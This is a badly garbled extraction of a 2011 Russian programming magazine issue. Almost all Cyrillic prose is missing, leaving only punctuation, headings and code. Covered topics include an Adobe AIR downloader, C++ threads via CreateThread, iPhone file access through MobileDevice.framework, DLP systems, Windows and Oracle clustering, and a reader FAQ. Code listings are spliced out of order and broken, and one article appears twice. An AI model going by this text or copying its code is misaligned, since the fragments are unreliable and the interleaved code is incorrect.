<center><h1>HELLO, WORLD!</h1></center>
</body>
</html>
108
, .
XML.
application
, . application xmlns XML.
AIR-.
. . .
?
Adobe AIR, . application
:
id AIR-.
com.
_._. 212 ;
filename air-. ,

( , name).
version :
title ;
initialWindow . swf-, html ( ). :
content ;
visible ;
width ;
height ;
X X;
Y Y;
X 03 /146/ 2011
>> coding
?
transparent ;
resizable ;
..
.
,
vr-online.ru/content/adobe-air-directives-2003.
,
Adobe AIR . . Aptana Studio
( ).
, , ,
. . ,
Hello World
.
, , .
?
, .
Aptana Studio
SimpleDowload.

: css, js, images. , .
- .
, , . ,
SimpleDownloader.html. ,
.
. HTML-
.

<body>
<center><h1>][ 0.1.1</h1></center><br /><br />
<b><label class="label"> : </b>
<input type="text" id="file_url" value="http://"
size="30"></label><br />
<b><label class="label"> :</b>
<input type="text" id="save_path" value="C:\temp\"
size="30"></label><br />
<button onclick="downloadIt();">!</button>
</body>
.
X 03 /146/ 2011
CSS
: , Adob Apple , . ,
css-.
css .
style.css :
.label {
float:left;
width:20em;
text-align: left;
clear:left;
margin-right: 20px;
color: #A77FFF;
}
h1 {
color: #008CFF;
}
css SimpleDownloader.html. ( head):

<link href="css/style.css" rel="stylesheet" media="all"
/>
,
. ,
. CSS , . CSS ,
.
, ,
JavaScript . , ,
- ,
JavaScript
. AIRAliases.js,
Adobe AIR SDK. -:
<script type="text/javascript" src="lib/air/AIRAliases.
js"></script>
URLStream,
URLRequest . , ,
.
SDK ( , ) ,
,
URLStream
(. ).
109
CODING

function downloadIt()
{
var file_url =
document.getElementById('file_url').value;
var save_path = document.getElementById(
'save_path').value + "\\"
+ GetFilename(file_url);
var download_url = new air.URLRequest(file_url);
var urlStream = new air.URLStream();
var file = new air.File();
file.nativePath = save_path;
var fileStream = new air.FileStream();
urlStream.addEventListener(
air.ProgressEvent.PROGRESS,
function(){
writeToFile(event, urlStream, fileStream);
}, false);
urlStream.addEventListener(
air.Event.COMPLETE,
function(){
saveFile(event, urlStream, fileStream);
}, false);
fileStream.open(file, air.FileMode.WRITE);
. writeToFile() saveFile().
,
, . COMPLETE

saveFile().
.
, .
, ,
,
, ,
JS (
AIR ).
.
writeToFile() saveFile().
Adobe AIR .
, .
.
, - (, yahoo),
. , .
! z
AIR
urlStream.load(download_url);
}
function writeToFile(e, urlStream, fileStream)
{
if (urlStream.bytesAvailable > 0)
{
var data = new air.ByteArray();
urlStream.readBytes(data, 0,
urlStream.bytesAvailable);
fileStream.writeBytes(data, 0, data.length);
}
}
function saveFile(e, urlStream, fileStream)
{
var data = new air.ByteArray();
urlStream.readBytes(data, 0,
urlStream.bytesAvailable);
fileStream.writeBytes(data, 0, data.length);
fileStream.close();
alert(" !");
}

. , Delphi/C++,
,
.
.
,
file_url save_path . ,
URLRequest ( ), URLStream
( ) File ( ).

110
Adobe AIR ,
. Titanium (- ][
). , Titunium , Adobe
AIR, , , :
Python,
Ruby, PHP JavaScript; ; HTTP; . , Titanium (appcelerator.com/products)
. ( Adobe AIR)
Open Source . ,
, ,
.

web-
/ -. ,
Adobe AIR, ,
. Mozilla Prism
(prism.mozilla.com). ,
Mozilla Corporation FireFox.
Prism
web-. ,
,
, Prism, , .
.
web-
. ?
(, )
Prism.
. web-,
, .
, Prism (
XULRunner) GUI.
X 03 /146/ 2011
CODING
deeonis deeonis@gmail.com
. ,
- .
.
. , C++
, .
,
.
Windows API CreateThread. _beginthread
, CreateThread . .

DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
//
//
return 0;
}
class MyClass
{
public:
MyClass(void);
~MyClass(void);
void RunThread();
private:
int m_intVar;

class MyClass
{
public:
...
void RunThread();
private:
DWORD WINAPI ThreadFunc(LPVOID lpParam);
int m_intVar;
};
DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
...
return 0;
}
void MyClass::RunThread()
{
HANDLE hThread;
DWORD idThread;
//
hThread = ::CreateThread(NULL, 0, &ThreadFunc,
0, 0, &idThread);
};
{
HANDLE hThread;
DWORD idThread;
0, 0, &idThread);
}
. MyClass,
CreateThread. ThreadFunc . ,
, - .
, . ,
. :
112
,
, , .
, , ,
ThreadFunc
CreateThread. MyClass
,
, API , , , .

.
, ,
ThreadFunc , MyClass friend.
X 03 /146/ 2011
VS
private MyClass. , ThreadFunc
,
,

.
{
HANDLE hThread;
DWORD idThread;
//
//
this, 0, &idThread);
,
DWORD WINAPI ThreadFunc(LPVOID lpParam);
}
class MyClass
{
public:
...
void RunThread();
friend DWORD WINAPI ThreadFunc(LPVOID lpParam);
private:
int m_intVar;
};
DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
// private
MyClass* mc = (MyClass*)lpParam;
mc->m_intVar = 90;
cout << _T("Start thread, m_intVar = ")
<< mc->m_intVar;
return 0;
}
X 03 /146/ 2011
, : ThreadFunc
MyClass, ,
.
, , , .
,
ThreadFunc . ,
, .
, .
,
.
- ThreadFunc , , MyClass, ,
.
,
.

class MyClass
{
113
CODING
MSDN CreateThread
public:
...
void RunThread();
private:
static DWORD WINAPI ThreadFunc(LPVOID lpParam);
int m_intVar;
};
DWORD WINAPI MyClass::ThreadFunc(LPVOID lpParam)
{
// private
MyClass* mc = (MyClass*)lpParam;
mc->m_intVar = 90;
cout << _T("Start thread, m_intVar = ")
<< mc->m_intVar;
,
. :
__closure
typedef unsigned long (__stdcall *ThdFunc)(void
*arg); //
typedef unsigned long (__closure *ClassMethod)(void
*arg); //
//
typedef union
{
ThrdFunc Function;
ClassMethod Method;
} tThrdAddr;
class MyClass
{
private:
tThrdAddr Addr;
return 0;
protected:
unsigned long ThreadFunc(void *arg)
{
...
};
}
{
HANDLE hThread;
DWORD idThread;
public:
RunThread()
{
DWORD idThread;
//
//
0, 0, &idThread);
Addr.Method = &ThrdHandle;
//
.
MyClass,
. ThreadFunc private ,

.

, , .
, C++ Builder,
.
__closure,
. , . 4- ,

this ,
8- .
114
CreateThread(NULL, 0, Addr.Function,
this, 0, &idThread);
};
};
,
Builder, .
,
. , ,
, .
-, . , - -
.
. z
X 03 /146/ 2011
>> coding
CODING
(seva@vingrad.ru)
IPHONE
MAC
OS X
Mac OS X
Apple
, iPhone, iPad
iPod touch Mac OS X,
iTunes.

Mobile Device Framework.
:
iPhone ?. ,
,
, , iTunes Apple. iPhone
iPod ( iPod touch) Mac OS X, .
Apple
, ,
, Apple .
iPhone, .
Wi-Fi ( FlashDrive),
USB (iPhone Folders).
USB Wi-Fi ,
.
X 03 /146/ 2011
. , USB,
: (
jailbreak), .
iPhone folders
(iphonefolders.com). iPhone Folders Windows
Explorer, ,
iPod touch iPhone,
USB, . ,
,
jailbreak , iTunes.
(Touch Drive, Touch
Copy ), , ,
, .
Mac OS X
iPhoneDisk MacFuse,
iPhone.
115
CODING
libmobiledevice iPhone
Mac OS X :
usbmuxd/libiphone,
libmobiledevice
MobileDevice.framework.
Mac OS X
. /System/Library/
PrivateFrameworks/MobileDevice.framework. ,
, . ,
-,
theiphonewiki.com. mobiledevice.h,
MobileDevice.framework
, USB- . MobileDevice.
framework .
iPhone Finder
iPhoneDisk
,

, , , USB Drive,
Cydia. , , ,
,
. Default
: ,
iPhoto ( PTP Picture
Transfer Protocol) iTunes.
, Drive + iTunes, Mac OS X. PTP , Mass Storage,
USB-. iTunes XCode
. Drive Only
USB-. .
iTunes
, Apple
,
iTunes, ,
USB-, ,
. Apple
Linu, . libimobiledevice
(libimobiledevice.org). libimobiledevice , iPhone, iPod touch, iPad Apple TV.
,
jailbreak
.
, , SpringBoard, , .
, USB libusb-1.0. usbmuxd , TCP/IP USB. , USB-
,
, .
libusbmuxd. libiphone
iOS.
, AFC- ( AFC2-) . AFC (Apple File Connection)
, iPhone/iPod touch.
iTunes .
116
Objective-C/Cocoa. XCode MobileDevice.framework, . : MobileDevice MobileDeviceServer.

, / .

#import <Cocoa/Cocoa.h>
#import "MobileDevice.h"
@interface MobileDevice : NSObject {
@public
struct am_device * dev;
struct afc_connection * conn;
}
- (MobileDevice *) initWithDevice:
(struct am_device *) device;
- (MobileDevice *) copy;
// AFC
- (BOOL) connect;
// ,
- (NSString *) getValue: (CFStringRef) name;
//
- (BOOL) pathExist:
(NSString *) path;
- (BOOL) downloadFile: (NSString *)

remote_path toLocation: (NSString *) local_path;
- (BOOL) uploadFile: (NSString *) local_path
toLocation: (NSString *) remote_path;
- (BOOL) downloadDirectory: (NSString *) remote_path
toLocation: (NSString *) local_path;
- (BOOL) uploadDirectory: (NSString *) local_path
toLocation: (NSString *) remote_path;
- (BOOL) removeDirectory: (NSString *) remote_path;
- (BOOL) isDirectory:
(NSString *) path;
@end
// ,
// init , defaultServer
//
@interface MobileDeviceServer : NSObject {
@public
NSMutableArray * MobileDevices;
}
+ (MobileDeviceServer *) delfaultServer;
@end
MobileDeviceServer ,
.
X 03 /146/ 2011
>> coding
MobileDevice.framework /
,
MobileDevice.
Amarok
Rhythmbox
libgpod
ifuse
@implementation MobileDeviceServer
gvfs-afc
static MobileDeviceServer * DefaultServer = nil;
libiphone
static void AmDeviceNotificationCallback(

struct am_device_notification_callback_info
* info)
libusbmuxd
{
if (info->msg == ADNCI_MSG_CONNECTED)
{ //
usbmuxd
MobileDevice * device = [[MobileDevice alloc]

initWithDevice: info->dev];
[device connect];
[DefaultServer->MobileDevices addObject: device];
libusb-1.0
}
else if (info->msg == ADNCI_MSG_DISCONNECTED)
{ //
libmobiledevice
for (int i = 0;
i < [DefaultServer->MobileDevices count];
++i)
{ //
if (((MobileDevice *)[DefaultServer->MobileDevices
objectAtIndex: i])->dev == info->dev)
{
[DefaultServer->MobileDevices removeObjectAtIndex: i];
if (conn == nil) return FALSE;

afc_file_ref file_ref;
if (AFCFileRefOpen(conn, [remote_path cString],
AFC_MODE_READ, 0, &file_ref) != 0)
return FALSE;
FILE * local_file = fopen(
[local_path cString], "w");
break;
if (local_file == NULL) {
AFCFileRefClose(conn, file_ref);
return NO;
}
+ (MobileDeviceServer *) delfaultServer
char buffer[10000];
}
}
}
int len;
if (DefaultServer == nil) {
DefaultServer = [[MobileDeviceServer alloc] init];
do {
len = sizeof(buffer);
if (
AFCFileRefRead(conn, file_ref, buffer, &len) != 0)
{
fclose(local_file);
AFCFileRefClose(conn, file_ref);
return NO;
}
//
DefaultServer->MobileDevices =
[[NSMutableArray alloc] init];
// MobileDevice.framework
struct am_device_notification * subscription;
if (AMDeviceNotificationSubscribe(
&AmDeviceNotificationCallback,
0,0,0,&subscription) != 0)
{ // :(
fwrite(buffer, len, 1, local_file);

} while(len == sizeof(buffer));
fclose(local_file);
[DefaultServer->MobileDevices release];
[DefaultServer release];
DefaultServer = nil;
}
AFCFileRefClose(conn,
return YES;
}
return DefaultServer;
}
@end
AFC downloadFile MobileDevice.

, .
- (BOOL) downloadFile: (NSString *) remote_path
toLocation: (NSString *) local_path
{
X 03 /146/ 2011
file_ref);
, , Mac OS X
Apple, iPhone folders .
iPod/iPhone Mac OS X , ,
(iTunes, Apple mobile device support ).
. z
117
SYN/ACK
, InfoWatch

DLP-?

, ,
DLP-.
, ,
, , .
, , , , , ,
.
DLP-
-
. , DLP-
c ,
,
,
.
,
.
DLP-.
,
.
, , ( , ,
)
,
.
(, ) (Digital Fingerprints, Document
DNA, ).
, .
118
- (,
)
DLP. ,
-, ,
, .

email-. ,
.
,

.
, -?
, , ,
.
,
.
DLP-
.
:
. ,
, : .

.
(, , , , ),
X 03 /146/ 2011
(
, ,
, , ).
( ,

), . , .
,
.
(SMS, -)
, -, .
2008 ,
, , ,
.
,
, ,
,
. , ,

. , , -
, ,
.
( , , ) , .
.
,
. ,
,

, .
X 03 /146/ 2011

. .

( ,
)
,
. 2010
- , ,
,
.

.
, , , .
,
(, ),
, (,
) .

.
, , .

.
,
,
, .
119
SYN/ACK
.
.
.

, .
, ,
.
, ,

.
,
. ( ) , .
.
- , + - .
, ,
, , ,
, .

,
.
, ,

, , , , , .
. CAD/CAM,
, , (/) - ,
.
, DLP- .

-
. - Probably SPAM, , .
, (/ ),
, ,
.
92-95% , ,
120

(
).

, .

.
,
-, :
, .
DLP- ,
.
, DLP , Google.
, ,
.
(
)
70- , .
, .

,
.
, , ,
,
. , (
60%), 70- ,
. , - DLP-
, , ,
, .

,
,
. ,
,
,
.

,
X 03 /146/ 2011
,
.
.
, ( Digital Fingerprint,
Document DNA), , .
,
. ,
(
), .
, . ,
. (, 10 000 ),
, ,
9 900 , ,
.
,
, ,
. ,
,
-.
,

3% () 15% ( ). ,
.
,
-. ( 100%) ,
.

, .
, ()
.
, , , ,
.
.
, /, .
.
,
. (
, ) .

, . , , , ,
DLP- .
. , DLP- 100% , -.

X 03 /146/ 2011
,
-,
, .
, .
.
, MP4- .
,
, :
... ,
, ,
, , call-. ,
, . , ,
,
, . , DLP-
, , .
,
, . ,
, .

.
,
.
- , ,
. , , , , ,
. , , InfoWatch
Morph-OLogic, Websense PreciseID,
Digital Fingerprint, .
,
. , ,
. ,
.
.
,
DLP-. , , ,
( , , ),
,
.
.
,
, DRM-, Oracle IRM
Microsoft RMS.
DLP-
,
, .

. z
121
SYN/ACK
, IT-Academy & Softline it-university.ru

Microsoft Oracle
, , ,
.
, , .
, Microsoft Oracle.
(
),
.
. :

(high-availability clusters failover clusters)
.
(load-balancing clusters)
,
.
(compute clusters), , , , .
(HPC high performance computing clusters),
82% Top500.
(gird)
,
. -
,
. - HPC-, .
.
active/active, ,
active/passive.
122
Oracle RAC Network Load Balancing active/

active . Failover Cluster Windows Server
active/passive . active/active , . ,
, Ethernet, InfiniBand.
,
, Oracle RAC 15 .
Fibre Channel, iSCSI
NFS .

( Windows Server 2008 R2) ,
(OracleDatabase 11g), .
Windows Clustering
Microsoft
. Windows Server 2008 R2 : Network Load Balancing (NLB) Cluster Failover Cluster. Windows Server 2008 HPC Edition .
HPC-,
, web- .
NLB- TCP/IP .
, IIS, VPN . , X 03 /146/ 2011
SYN/ACK
, IT-Academy & Softline it-university.ru

Microsoft Oracle
, , ,
.
, , .
, Microsoft Oracle.
(
),
.
. :

(high-availability clusters failover clusters)
.
(load-balancing clusters)
,
.
(compute clusters), , , , .
(HPC high performance computing clusters),
82% Top500.
(gird)
,
. -
,
. - HPC-, .
.
active/active, ,
active/passive.
122
Oracle RAC Network Load Balancing active/

active . Failover Cluster Windows Server
active/passive . active/active , . ,
, Ethernet, InfiniBand.
,
, Oracle RAC 15 .
Fibre Channel, iSCSI
NFS .

( Windows Server 2008 R2) ,
(OracleDatabase 11g), .
Windows Clustering
Microsoft
. Windows Server 2008 R2 : Network Load Balancing (NLB) Cluster Failover Cluster. Windows Server 2008 HPC Edition .
HPC-,
, web- .
NLB- TCP/IP .
, IIS, VPN . , X 03 /146/ 2011
,
, . NLB-
x64-, x86.
Failoverclustering ,
.

LAN- WAN-, multi-site Windows Server 2008
500 , heartbeat.

. Enterprise edition ,
, .
(cluster-unaware)
.
(cluster-aware),
ClusterAPI,
.
failover-
.
, The Microsoft Support Policy
for Windows Server 2008 Failover Clusters. .
, FibreChannel, iSCSI Serial Attached SCSI. ,
Windows Server 2008, persistent
reservations.
X 03 /146/ 2011

Failover Clustering , Server Manager.
,
.
. , ,
member server, domain controller
DNS Exchange.
, . Failover
Cluster Management.
, (. 1).
. Failover Cluster
Management Create Cluster, , ,
IP-. ,
(,
), Failover Cluster Management
Do not allow the cluster to use this network.
,
. High Availability Wizard,
Services and Applications Failover
Cluster Management (. 2).
Cluster Shared Volumes
failover- LUN, ,
,
123
SYN/ACK
. 1. failover-
(. 3). LUN .
,
.
, - , LUN , ,
, LUN,
, LUN, .
( Hyper-V Server 2008)
LUN,
. Server
2008 R2 ,
Hyper-V CSV (Cluster Shared Volumes). CSV
,
(
) .
CSV NTFS.
CSV Failover Cluster Manage Enable
Cluster Shared Volumes. CSV
:
Get-Cluster | %{$_.EnableSharedVolumes = "Disabled"}
Failover
Clusters, PowerShell. CSV live
migration ,
. , (,
) , CSV, -. , -
124
, -. ,
(,
), -.
Oracle RAC
Oracle Real Application Clusters (RAC)

Oracle Database, Oracle Database 9i
OPS (Oracle Parallel Server).

. Oracle Database -

High Availability Microsoft: microsoft.com/
windowsserver2008/en/us/high-availability.aspx;

Failover Clustering NLB: blogs.msdn.com/b/clustering/
archive/2009/08/21/9878286.aspx ( Clusteringand HighAvailability );
Oracle RAC: oracle.com/
technetwork/database/clustering/overview/index.html;
Oracle Clusterware Oracle
Grid Infrastructure: oracle.com/technetwork/database/
clusterware/overview/index.html;
Oracle Clusterware Single Instance
Oracle Database 11g: oracle.com/technetwork/database/si-dbfailover-11g-134623.pdf.
X 03 /146/ 2011
. 2. High availability wizard

, ,
. ,
,
. (instance)
(SGA) .
RAC
.
RAC Enterprise Edition
. , RAC Standard
Edition, Enterprise Edition,
.
Oracle Grid Infrastructure
Oracle RAC Oracle Clusterware (

) .
( 11g R2
, , ). 11g Oracle Clusterware ASM Oracle Grid Infrastructure,
.
Automatic Storage Management (ASM)
, , singleinstance . ASM ASM Allocation Unit.
Allocation Unit AU_SIZE,
1, 2, 4, 8, 16, 32
64 MB. Allocation Units ASM-
(. 4).
, ASM, .
ASM- Failure Group (
X 03 /146/ 2011
, ,
, ), , Failure
Group. ASM
, . ASM ,
Oracle, ,
RMAN.
, ASM.
ASM-. Oracle ASM
, RAW-.
. 3. Failover_cluster
125
SYN/ACK
, Oracle
, Oracle.
Oracle
,
.
Installation Guide, .
,
Oracle
Clusterware. votingdisk (, ) Oracle Cluster Registry (
,
).
votingdisk. ASM ASMLib,
:
# rpm -Uvh oracleasm-support-2.1.3-1.el4.x86_64.rpm
# rpm -Uvh oracleasmlib-2.0.4-1.el4.x86_64.rpm
# rpm -Uvh oracleasm-2.6.9-55.0.12.ELsmp-2.0.3-1.
x86_64.rpm
. 4. ASM disk group
Oracle RAC
,
Oracle RAC active/active
(. 7).
Oracle Database
11g Release 2. Oracle
Enterprise Linux 5. Oracle Enterprise Linux ,
RedHat Enterprise Linux.

Interconnect, External Backup.
IP- ( Oracl e GNS) DNS (
GNS).
Grid Infrastructure.
,
(. 5).
; , ;
; .
root orainstRoot.sh
root.sh. orainstRoot.sh,

.
orainstRoot.sh root.
sh. :
/u01/grid/bin/crsctl check cluster all
, .
Oracle Universal installer (. 6),
.
. 5. OracleGrid Infrastructure
126
X 03 /146/ 2011
. 6. Oracle 11g R2 universal installer

active/active- 11g R2
active/passive-.
Oracle RACOneNode.
RAC Oracle Clusterware.
; Grid
Infrastructure, ASM_CRS SCAN;
Standalone. ,
.
Oracle RAC Oracle Grid Infrastructure

.

.
Microsoft , ,
. ,
, . z
. 7. Oracle RAC c
X 03 /146/ 2011
127
SYN/ACK
.., . InfoWatch

( ) ,
.
, ( ) , .
( )
, .
.
, , ,
.
(
), , , .
, .
XVI ,
XIX,
XX .
, ( , ) . , .
:
.
, -
, ,
.
,
,
.
, ,
,
.
.
. :

,
.
128

.
.
, ,
, ,
, , .

. ,
.
.
,
,
.
(, , ) ,
.
, .
, .
,
.

.
.
,
.
,
. ,
: .

(), DRM (Digital Rights
Management []
). X 03 /146/ 2011
. ,
CD, , ,
save as . . , :
, .
, ,
: , ,
,
, , (. 1299 ).
X 03 /146/ 2011
, , ( 4 2010 ,
).
, .
, . ,
(.
).
129
SYN/ACK
. .
( ) .
c Sony BMG
: , ,
.
.
,
, , .
. (. 273 ) ,
,
-
. .
DRM- XCP
Sony BMG . ,
-,
, (-, ),
.
, .
, , .
,
, 28 (. 272-274).
, , .
, ,
( ),

.
. . ,

. , ,
dbf- . ,
,
. , DBF, , -
,
.
, .
, , : !
. ,
.
, -
,
. .
: ,
!. - , , ,
, . -
,
. .
, ,
130
X 03 /146/ 2011
(. 273 ):
,
, , ,
, .
:
,
, ,
(,
), (
) .
PGPdisk.
.
,
. , .
.
,
.
.
.

. ,
, ,
. . , , ,
.
.
.
, . ,
,
.
. ,
, . ,
, :
, , , , . . , ,
.
, ,
.
, (
) , . ,
, . ,
. . .
, , , , - . ,
,
.
, .

. ,
.
. .
,
.
.
, , ,
. -,
. , ,
.
. .
, 273-
,
. ,
.
,
, : , , .
, .
, .
, , . z
.
. , , .
, . .
.
,
, ,
,
,

, ,
X 03 /146/ 2011
131
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:

:
, , ,
.
,
,
, ,
, ,
,
.
()
, .
,
. , -,
( , ), -
( ).
()
. ,

: , , (
,

);
,
.
:
(, ),
(, ),
, (),
, ,
132
,
.
, , ,
,
,
;
:
- ,
;
-
, ,

, , .
:
, .

,
99
, , PR
.

.
, , , ,
.
, ,
:
.
,
: ,
,
.

:
, , ,
.
,
:
, ,
,
(
,
, ).
,
: ,
, ,
-
,
,
. , ,
, ,
.

( ,
).
X 03 /146/ 2011
X 03 /146/ 2011
133
UNITS
(
)

.
( ) , , . ,

,
,
( ).

,
, ,
,
, .
,
,
,
, , ,
, , .
,
(
)
,
.

.

,
, , .
:
( )
, (
),
.
( ,
) , ,
, ,

.
: ,

.
- :
, ; ,
. ,
. ,
, -
134

, , , 1
.

,
. ,

,
, ,
.

-
,
.
1 ?
()
,
. - ? (
),
.
,
X 03 /146/ 2011
INFO
info

.
WARNING
warning
, ( + )
( ,

)
.
,
,
, , ,
, .

, ,
.

-
(-,
!).
,
.
,
, .

( , ) (,
-, ), X 03 /146/ 2011

,

. ,

,

,

.

,
.

,
,
,
. , ,
,

, .

:
, ,
, (
, ),
,
. , (

) ,
(
) , .
, ,
( ,

, ),

.

,
. , , , , .
:
135
UNITS
. Epic fail
, ,
,
. : (, ) ,
, ,
(,
) , .
, , .

, -,
,
. , ,
,
,
( )
.

!, !,
. ,

,
(: , ) ,
.
,

,
. , :
,
, ,
,
.
-
136
(, , )

: ,
(, ), ,
. , ,
.
),
, .
,

.

,
, .
, :
. ,
.

:
, . ,

. ,
.
,

, (),
.

:
- , ,

.
, - , .
, :

.
,
,
.
. ,

.
, ,
. -

,
,
.

,
,
SHODAN.
,

, . .
, ,
, :
, ,
.

( -
,
.
X 03 /146/ 2011

:
( ),
(,
). .
: ,
400 , 290,
, ,
200.
-
, ,
, ,
.
:
, .
,
: , , ,
.
, .
,
,
, , ,
,
-
.
,
0
!*,

, *
1500 ./
.
,
,
X 03 /146/ 2011
. , , ,

, , 100%. , , 98:
100 ,
,
, , , ,
.

.

, .
, :
,
( , )
,
( , ),
.
3/8 ( )
.

( ),
, ,
,
. ,
:
,
: ,
, .
, , , :
30 !.
( -

, ),
.
,
,

, , .
,
, -
, :
100%- , ?

. , ,

,
,
, 20-
, .

(,
), .

, .
( ) :
( ),
- , , , Sobranje.
. VIP, Business
Optima. .

,
.

,
,
. .

, , , .
,
- ,
,
(-, :
,
).
.
! :) z
137
UNITS
Step twitter.com/stepah
faq
united?
faq@real.xakep.ru
Q:
WinAPI-.
,

, . ( C++),
.
?
A: WinAPI
.
WebMoney,
WM Keeper
,
. (
,
)
(bit.ly/winapi_hack_
webmoney). .
,
++
. winapiexec (rammichael.com/
winapiexec),
. : winapiexec.
exe library.dll@FunctionName 123
unicode_text "a space"

, . ,
138
, winapiexec.
.
1.
: winapiexec.exe
CreateProcessW 0 calc 0 0 0 0x20 0
0 $a:0x44,,,,,,,,,,,,,,,, $b:16
, Sleep 1000 , TerminateProcess
$$:11@0 0
2. -: winapiexec.
exe u@SendMessageW ( u@FindWindowW
Shell_TrayWnd 0 ) 0x111 420 0
3. MessageBox temp:
winapiexec.exe GetTempPathW 260
$b:520 , u@MessageBoxW 0 $$:3 $$:0
0x40
,
WinAPI-,
: codeproject.com/KB/miscctrl/Taskbar_
Manipulation.aspx.
Q: , ,
.
FB2 ( ), ePub . ?
A: , .
FB2, ePub , ,
. ,
.
fb2epub.com FB2 ePub . ,
, -
.
, Kindle Amazon
(- $139, ,
Wi-Fi ).

: MOBI
-. Kindle
Calibre (calibre-ebook.
com). ,

.
, ,
FB2 ,
.
Q:
.
- ,

. ?
A: , , ( ) .
Windows
.
,
. ,
USB Safely Remove (safelyremove.com)
Zentimo (zentimo.com).
(
X 03 /146/ 2011
Loginza

,
, .

Amazon - Amazon Simple Email Service
(SES),
.
, ,

.
$0.10.

( $0.10 ).
(bit.
ly/amazon_ses_scripts), .
,
,

:).
Q:
MySQL. PBXT (primebase.org).
?
:

, , ),
( !) ,

.

Windows, .
. Wordpress, phpBB, Joomla,

Cogear, Drupal .

6 500 . ,
, ,
.
Q:
(Facebook, , Google ) .
?
A: -
:
1. , (,
MySQL 5.1 ).
mysql-: show
variables like "%plugin%".
SQL-
phpMyAdmin. -
/home/my-user/mysql/lib/mysql/plugin.
2. Lanchpad
(launchpad.net), Bazzar:
bzr branch lp:pbxt /tmp/pbxt-src
3. :
./configure --with-mysql=<builddir>/<mysql-src> --with-plugindir=
<mysql-dir>/lib/mysql/plugin
4. , , :
make && make install.
5.
SQL-,
: INSTALL PLUGIN
pbxt SONAME 'libpbxt.so'
6. ,
: CREATE TABLE t1 (c1 int,
c2 text) engine=pbxt;. : ALTER TABLE t1
engine=pbxt.
,
PBXT.
Q: email (
) . ,

sendmail, (
), ,
Lozinza (loginza.
. ru). , - ? ,
,
.
(, Google, Rambler, Mail.
A:
Ru, LiveJournal, etc), -
Q: , VPN-?
: , GRE-
Facebook, OpenID. Loginza.API

.
itshidden.com VPN-,
PPTP.
, , , GRE- -
X 03 /146/ 2011
subscribe.ru
( ),
.
!
139
UNITS
.
OpenVPN SSH-.
Q: ,

.
, .
?
A:
:
. ?
. ,

,
.
,
, .
(, Windows Mobile
Android), - . ,
,
. , ,

.
, ,
, .
. ,
,
.
iOS Simulator , Apple.

XCode Mac OS
X: developer.apple.com/devcenter/ios/index.action;
Android Emulator
Android 1.1, 1.5, 1.6, 2.0, 2.1, 2.2
& 2.3 (
SDK): developer.android.com/guide/
developing/tools/emulator.html;
Samsung Galaxy Tab Add-on c
Android SDK, Samsung
Galaxy Tab: innovator.samsungmobile.com/
galaxyTab.do;
HP webOS Emulator HP (Palm Pre, Palm Pixi,
Palm Pixi Plus), SDK:
developer.palm.com/index.php?id=1744;
Nokia Symbian Emulators
,
Symbian: bit.ly/symbian_emulators;
BlackBerry Simulators c
C Blackberry: blackberry.com/developers/
downloads/simulators;
Windows Mobile 6.5 Emulator Images WM6.5: bit.ly/WM65emulator;
Windows Phone 7 Simulator
Microsoft, -
140
Android
Visual Studio: bit.ly/
WP7simulator;
Bada Simulator Bada Samsung: bit.ly/Bada_simulator.
Q:
, Google Protocol Buffers. ,
? XML?
A: Protocol Buffers ( )
, .
XML, ,
. ,
,
\
, Java, C++ Python.
.proto-:
message Person {
required string name = 1;
required int32 id = 2;
optional string email = 3;
}
.proto- .

.
Person person;
person.set_name("John Doe");
person.set_id(1234);
person.set_email(
"jdoe@example.com");
fstream output(
"myfile", ios::out | ios::binary);
person.SerializeToOstream(&output);
XML? Protocol
Buffers , 10-20 3-10

.
.
, Twitter
Protocol Buffers. Twitter, XML .
(code.google.
com/p/protobuf).

MessagePack (msgpack.
org), .
, JSON, ,
,
. Ruby,
Perl, Python, C/C++, Java, PHP, Haskell, Lua.
Q: Windows,
,
Linux- BSD-?
,
Ext4.
, , Ext2/3/4 UFS/UFS2.
A: R.Saver
(rlab.ru/tools/rsaver.html).
FAT
NTFS.
:
Microsoft Windows: FAT NTFS,
FAT12, FAT16, FAT32, NTFS, NTFS5;
Apple Mac OS: HFS, HFS+/HFSX;
Linux: Ext2, Ext3, Ext4, ReiserFS, JFS XFS;
Unix, BSD, Sun Solaris: UFS UFS2 (FFS),
UFS , Sparc/Power .
z
X 03 /146/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
>Net
Angry IP Scanner 4.0 beta4
Configuration Center Workgroup 1.7
DNS Performance Test
>Multimedia
calibre 0.7.44
Dual Monitor Tools 1.7
Fraps 3.2.8
freac 1.0.17a
GrooveWalrus 0.331
ImgBurn 2.5.5.0
Kindle for PC
Miro 3.5
Okozo Desktop 1.1.6
SaveGameBackup.net 1.0.3
Skype Recorder 3.0
Sumatra PDF 1.3
UMPlayer 0.9
VLC media player 1.1.7
>Misc
Auspex 1.2.2.98
Boot Snooze 1.0.5
briss 0.0.12
File Bucket 1.1.0
Input Director v1.2.2
Locate32 3.0
Microsoft Mathematics 4.0
Moo0 FileShredder 1.15
Registry Commander 10.04
SearchMyFiles 1.62
Shapeshifter 3.09
SysInternalsUpdater 1.0.0
Translate.Net 0.1.34
ZenKEY 2.3.5
>>WINDOWS
>Development
Android SDK r09
BinVis
BlueGriffon 0.9RC1
Code Visualizer 4.6
DbOctopus 1.1
Dependency Walker 2.2
Developer's Tips & Tricks 1.2.1.2
Free Hex EditorNeo 4.95
GalaXQL 2.0
Gobby 0.4.93
Google App Engine documentation
Google App Engine SDK for Java
1.4.0
Google App Engine SDK for Python
1.4.1
HeidiSQL 6.0
Parrot 3.0.0
PyCharm 1.1.1
Reflexil 1.1
RegexBuddy 3.5.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
Sublime Text 2 beta
TOra 2.1.3
Virtual Serial Ports Beta
wyBuild 2.5
>>UNIX
>Devel
Bluefish 2.0
CImg 1.4.7
GanttProject 2.0.10
Giggle 0.5
Gitg 0.1.0
Gschem 1.6.2
Jailer 3.5.1
JuffEd 0.8.1
KDevelop 4.2
LibRaw 0.12.3
libusb 1.0.8
Mojolicious 1.0
Neptune 0.6
Okteta 0.5
PyCharm 1.1.1
SCons 2.0.1
